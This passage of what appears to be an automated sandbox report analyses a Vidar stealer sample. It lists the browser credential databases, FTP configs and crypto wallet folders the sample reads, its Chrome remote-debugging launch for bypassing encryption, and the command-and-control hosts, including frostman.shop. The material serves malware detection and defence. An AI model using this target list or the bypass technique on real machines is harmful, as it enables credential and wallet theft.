                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\0absryc3.default\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\to-be-removed\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\sessionstore-backups\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\minidumps\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\archived\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\tmp\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\crashes\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\key4.dbJump to behavior
                  Tries to harvest and steal ftp login credentials
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                  Tries to steal Crypto Currency Wallets
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\backups\Jump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
                  Source: Yara matchFile source: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: ktyihkdfesf.exe PID: 1468, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Attempt to bypass Chrome Application-Bound Encryption
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                  Yara detected Vidar stealer
                  Source: Yara matchFile source: ktyihkdfesf.exe, type: SAMPLE
                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                  Source: Yara matchFile source: 0.2.ktyihkdfesf.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.ktyihkdfesf.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: Process Memory Space: ktyihkdfesf.exe PID: 1468, type: MEMORYSTR

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts3
                  Native API                  		1
                  DLL Side-Loading                  		1
                  DLL Side-Loading                  		1
                  Deobfuscate/Decode Files or Information                  		2
                  OS Credential Dumping                  		2
                  System Time Discovery                  		Remote Services1
                  Archive Collected Data                  		2
                  Ingress Tool Transfer                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault AccountsScheduled Task/Job1
                  Create Account                  		1
                  Extra Window Memory Injection                  		1
                  Obfuscated Files or Information                  		1
                  Credentials in Registry                  		1
                  Account Discovery                  		Remote Desktop Protocol4
                  Data from Local System                  		21
                  Encrypted Channel                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)211
                  Process Injection                  		1
                  DLL Side-Loading                  		Security Account Manager4
                  File and Directory Discovery                  		SMB/Windows Admin SharesData from Network Shared Drive1
                  Remote Access Software                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                  Extra Window Memory Injection                  		NTDS35
                  System Information Discovery                  		Distributed Component Object ModelInput Capture3
                  Non-Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  Masquerading                  		LSA Secrets11
                  Query Registry                  		SSHKeylogging14
                  Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  Virtualization/Sandbox Evasion                  		Cached Domain Credentials111
                  Security Software Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items211
                  Process Injection                  		DCSync1
                  Virtualization/Sandbox Evasion                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem12
                  Process Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                  System Owner/User Discovery                  		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1578709 Sample: ktyihkdfesf.exe Startdate: 20/12/2024 Architecture: WINDOWS Score: 100 55 frostman.shop 2->55 57 t.me 2->57 59 3 other IPs or domains 2->59 67 Suricata IDS alerts for network traffic 2->67 69 Found malware configuration 2->69 71 Multi AV Scanner detection for submitted file 2->71 73 7 other signatures 2->73 8 ktyihkdfesf.exe 29 2->8         started        12 msedge.exe 643 2->12         started        signatures3 process4 dnsIp5 61 frostman.shop 116.203.12.114, 443, 49715, 49716 HETZNER-ASDE Germany 8->61 63 t.me 149.154.167.99, 443, 49712 TELEGRAMRU United Kingdom 8->63 65 127.0.0.1 unknown unknown 8->65 75 Attempt to bypass Chrome Application-Bound Encryption 8->75 77 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 8->77 79 Found many strings related to Crypto-Wallets (likely being stolen) 8->79 83 5 other signatures 8->83 14 msedge.exe 2 10 8->14         started        17 chrome.exe 8->17         started        20 cmd.exe 8->20         started        81 Maps a DLL or memory area into another process 12->81 22 msedge.exe 12->22         started        24 msedge.exe 12->24         started        26 msedge.exe 12->26         started        28 3 other processes 12->28 signatures6 process7 dnsIp8 85 Monitors registry run keys for changes 14->85 30 msedge.exe 14->30         started        45 192.168.2.6, 443, 49427, 49520 unknown unknown 17->45 47 239.255.255.250 unknown Reserved 17->47 32 chrome.exe 17->32         started        35 conhost.exe 20->35         started        37 timeout.exe 20->37         started        49 20.110.205.119, 443, 49909, 49961 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 22->49 51 204.79.197.219, 443, 49969, 49970 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 22->51 53 21 other IPs or domains 22->53 signatures9 process10 dnsIp11 39 www.google.com 172.217.21.36, 443, 49764, 49765 GOOGLEUS United States 32->39 41 plus.l.google.com 32->41 43 apis.google.com 32->43

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  ktyihkdfesf.exe46%VirustotalBrowse
                  ktyihkdfesf.exe55%ReversingLabsWin32.Trojan.Generic
                  ktyihkdfesf.exe100%Joe Sandbox ML

                  Dropped Files

                  No Antivirus matches

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  No Antivirus matches

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  fg.microsoft.map.fastly.net
                  		199.232.210.172
                  		truefalse
                    		high
                    chrome.cloudflare-dns.com
                    		172.64.41.3
                    		truefalse
                      		high
                      plus.l.google.com
                      		172.217.17.46
                      		truefalse
                        		high
                        t.me
                        		149.154.167.99
                        		truefalse
                          		high
                          frostman.shop
                          		116.203.12.114
                          		truetrue
                            		unknown
                            ssl.bingadsedgeextension-prod-europe.azurewebsites.net
                            		94.245.104.56
                            		truefalse
                              		high
                              sb.scorecardresearch.com
                              		18.165.220.57
                              		truefalse
                                		high
                                www.google.com
                                		172.217.21.36
                                		truefalse
                                  		high
                                  s-part-0035.t-0009.t-msedge.net
                                  		13.107.246.63
                                  		truefalse
                                    		high
                                    ax-0001.ax-msedge.net
                                    		150.171.27.10
                                    		truefalse
                                      		high
                                      googlehosted.l.googleusercontent.com
                                      		142.250.181.65
                                      		truefalse
                                        		high
                                        clients2.googleusercontent.com
                                        		unknown
                                        		unknownfalse
                                          		high
                                          bzib.nelreports.net
                                          		unknown
                                          		unknownfalse
                                            		high
                                            assets.msn.com
                                            		unknown
                                            		unknownfalse
                                              		high
                                              ntp.msn.com
                                              		unknown
                                              		unknownfalse
                                                		high
                                                apis.google.com
                                                		unknown
                                                		unknownfalse
                                                  		high

                                                  Contacted URLs

                                                  NameMaliciousAntivirus DetectionReputation
                                                  https://steamcommunity.com/profiles/76561199809363512false
                                                    		high
                                                    https://tse1.mm.bing.net/th?id=OADD2.10239359955652_1UH15L5Z2LXM3P8PA&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90false
                                                      		high
                                                      https://sb.scorecardresearch.com/b2?rn=1734676307694&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=015EFEE8056263FB2030EBB304006296&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*nullfalse
                                                        		high
                                                        https://tse1.mm.bing.net/th?id=OADD2.10239381795372_1FAN52Y1AD18QPYNG&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90false
                                                          		high
                                                          https://c.msn.com/c.gif?rnd=1734676307694&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=87dea9e2d67e4be995ff056bd35dd4db&activityId=87dea9e2d67e4be995ff056bd35dd4db&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0false
                                                            		high
                                                            https://t.me/k04aelfalse
                                                              		high
                                                              https://tse1.mm.bing.net/th?id=OADD2.10239340418601_1XRLHD1YRS9ZZSDWX&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90false
                                                                		high
                                                                https://tse1.mm.bing.net/th?id=OADD2.10239381795371_1OWBWRW5WQA079L9Q&pid=21.2&c=3&w=1920&h=1080&dynsize=1&qlt=90false
                                                                  		high
                                                                  https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0false
                                                                    		high
                                                                    https://tse1.mm.bing.net/th?id=OADD2.10239317301631_1JS0AMCX251CLJ5OX&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90false
                                                                      		high
                                                                      https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734676313254&w=0&anoncknm=app_anon&NoResponseBody=truefalse
                                                                        		high
                                                                        https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734676313257&w=0&anoncknm=app_anon&NoResponseBody=truefalse
                                                                          		high
                                                                          https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734676307692&time-delta-to-apply-millis=use-collector-delta&w=0&anoncknm=app_anon&NoResponseBody=truefalse
                                                                            		high
                                                                            https://c.msn.com/c.gif?rnd=1734676307694&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=87dea9e2d67e4be995ff056bd35dd4db&activityId=87dea9e2d67e4be995ff056bd35dd4db&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=D7BFD8CBD1834510B8B7DB118C7D5586&MUID=015EFEE8056263FB2030EBB304006296false
                                                                              		high
                                                                              https://tse1.mm.bing.net/th?id=OADD2.10239360433542_1UJC4903W7XNIUU73&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90false
                                                                                		high
                                                                                https://assets.msn.com/statics/icons/favicon_newtabpage.pngfalse
                                                                                  		high
                                                                                  https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734676314250&w=0&anoncknm=app_anon&NoResponseBody=truefalse
                                                                                    		high
                                                                                    https://frostman.shop/true
                                                                                      		unknown
                                                                                      https://clients2.googleusercontent.com/crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crxfalse
                                                                                        		high
                                                                                        https://tse1.mm.bing.net/th?id=OADD2.10239381681309_1UONBZH0MSLU4XT86&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90false
                                                                                          		high
                                                                                          https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734676314091&w=0&anoncknm=app_anon&NoResponseBody=truefalse
                                                                                            		high

                                                                                            URLs from Memory and Binaries

                                                                                            NameSourceMaliciousAntivirus DetectionReputation
                                                                                            https://duckduckgo.com/chrome_newtabktyihkdfesf.exe, 00000000.00000002.2790355832.00000000038DF000.00000004.00000020.00020000.00000000.sdmp, Web Data.14.dr, V37YCB.0.dr, XBS26P.0.drfalse
                                                                                              		high
                                                                                              https://c.msn.com/2cc80dabc69f58b6_1.14.drfalse
                                                                                                		high
                                                                                                https://duckduckgo.com/ac/?q=ktyihkdfesf.exe, 00000000.00000002.2790355832.00000000038DF000.00000004.00000020.00020000.00000000.sdmp, Web Data.14.dr, V37YCB.0.dr, XBS26P.0.drfalse
                                                                                                  		high
                                                                                                  http://www.broofa.comchromecache_561.7.drfalse
                                                                                                    		high
                                                                                                    https://www.officeplus.cn/?sid=shoreline&endpoint=OPPC&source=OPCNshoreline37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drfalse
                                                                                                      		high
                                                                                                      https://ntp.msn.com/0000003.log9.14.drfalse
                                                                                                        		high
                                                                                                        https://ntp.msn.com/_defaultQuotaManager.14.drfalse
                                                                                                          		high
                                                                                                          https://www.last.fm/37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drfalse
                                                                                                            		high
                                                                                                            https://deff.nelreports.net/api/report?cat=msn2cc80dabc69f58b6_0.14.drfalse
                                                                                                              		high
                                                                                                              https://ntp.msn.cn/edge/ntp2cc80dabc69f58b6_1.14.drfalse
                                                                                                                		high
                                                                                                                https://sb.scorecardresearch.com/2cc80dabc69f58b6_1.14.drfalse
                                                                                                                  		high
                                                                                                                  https://deff.nelreports.net/api/reportReporting and NEL.15.drfalse
                                                                                                                    		high
                                                                                                                    https://frostman.shop/xgktyihkdfesf.exe, 00000000.00000003.2502205979.0000000000760000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		unknown
                                                                                                                      https://docs.google.com/manifest.json0.14.drfalse
                                                                                                                        		high
                                                                                                                        https://www.youtube.com37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drfalse
                                                                                                                          		high
                                                                                                                          https://deff.nelreports.net/api/report?cat=msnwReporting and NEL.15.drfalse
                                                                                                                            		high
                                                                                                                            https://www.instagram.com37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drfalse
                                                                                                                              		high
                                                                                                                              https://web.skype.com/?browsername=edge_canary_shoreline37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drfalse
                                                                                                                                		high
                                                                                                                                https://frostman.shopQQ1V3Omingktyihkdfesf.exe, 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpfalse
                                                                                                                                  		unknown
                                                                                                                                  https://drive.google.com/manifest.json0.14.drfalse
                                                                                                                                    		high
                                                                                                                                    https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=137ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drfalse
                                                                                                                                      		high
                                                                                                                                      https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=237ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drfalse
                                                                                                                                        		high
                                                                                                                                        https://www.messenger.com37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drfalse
                                                                                                                                          		high
                                                                                                                                          https://outlook.live.com/mail/inbox?isExtension=true&sharedHeader=1&nlp=1&client_flight=outlookedge37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drfalse
                                                                                                                                            		high
                                                                                                                                            https://outlook.office.com/mail/compose?isExtension=true37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drfalse
                                                                                                                                              		high
                                                                                                                                              https://unitedstates4.ss.wd.microsoft.us/edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.14.drfalse
                                                                                                                                                		high
                                                                                                                                                https://i.y.qq.com/n2/m/index.html37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drfalse
                                                                                                                                                  		high
                                                                                                                                                  https://www.deezer.com/37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drfalse
                                                                                                                                                    		high
                                                                                                                                                    https://web.telegram.org/37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drfalse
                                                                                                                                                      		high
                                                                                                                                                      https://cdnjs.cloudflare.com/ajax/libs/mathjax/offscreendocument_main.js.14.dr, service_worker_bin_prod.js.14.drfalse
                                                                                                                                                        		high
                                                                                                                                                        https://drive-daily-2.corp.google.com/manifest.json0.14.drfalse
                                                                                                                                                          		high
                                                                                                                                                          https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi0HDJEU.0.drfalse
                                                                                                                                                            		high
                                                                                                                                                            https://drive-daily-4.corp.google.com/manifest.json0.14.drfalse
                                                                                                                                                              		high
                                                                                                                                                              https://vibe.naver.com/today37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drfalse
                                                                                                                                                                		high
                                                                                                                                                                https://srtb.msn.com/2cc80dabc69f58b6_1.14.drfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://unitedstates1.ss.wd.microsoft.us/edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.14.drfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=ktyihkdfesf.exe, 00000000.00000002.2790355832.00000000038DF000.00000004.00000020.00020000.00000000.sdmp, Web Data.14.dr, V37YCB.0.dr, XBS26P.0.drfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://t.me/k04aelm0nk3Mozilla/5.0ktyihkdfesf.exefalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://assets.msn.com173f49f4-fd6a-4272-bd51-5a99421ced22.tmp.15.drfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://www.ecosia.org/newtab/V37YCB.0.drfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://drive-daily-1.corp.google.com/manifest.json0.14.drfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://excel.new?from=EdgeM365Shoreline37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brktyihkdfesf.exe, 00000000.00000002.2792537881.0000000003EB6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://drive-daily-5.corp.google.com/manifest.json0.14.drfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    https://play.google.com/log?format=json&hasfast=truechromecache_561.7.drfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://bzib.nelreports.net/api/report?cat=bingbusinessReporting and NEL.15.drfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        https://www.google.com/chromecontent_new.js.14.dr, content.js.14.drfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          https://www.tiktok.com/37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            https://www.msn.com/web-notification-icon-light.png2cc80dabc69f58b6_1.14.drfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              https://steamcommunity.com/profiles/76561199809363512m0nk3Mozilla/5.0ktyihkdfesf.exefalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                https://chromewebstore.google.com/manifest.json.14.drfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  https://drive-preprod.corp.google.com/manifest.json0.14.drfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    https://srtb.msn.cn/2cc80dabc69f58b6_1.14.drfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      https://msn.comXIDv10Cookies.15.drfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        https://www.onenote.com/stickynotes?isEdgeHub=true&auth=237ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          https://www.onenote.com/stickynotes?isEdgeHub=true&auth=137ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            https://chrome.google.com/webstore/manifest.json.14.drfalse
                                                                                                                                                                                                              		high
                                                                                                                                                                                                              https://y.music.163.com/m/37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drfalse
                                                                                                                                                                                                                		high
                                                                                                                                                                                                                https://unitedstates2.ss.wd.microsoft.us/edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.14.drfalse
                                                                                                                                                                                                                  		high
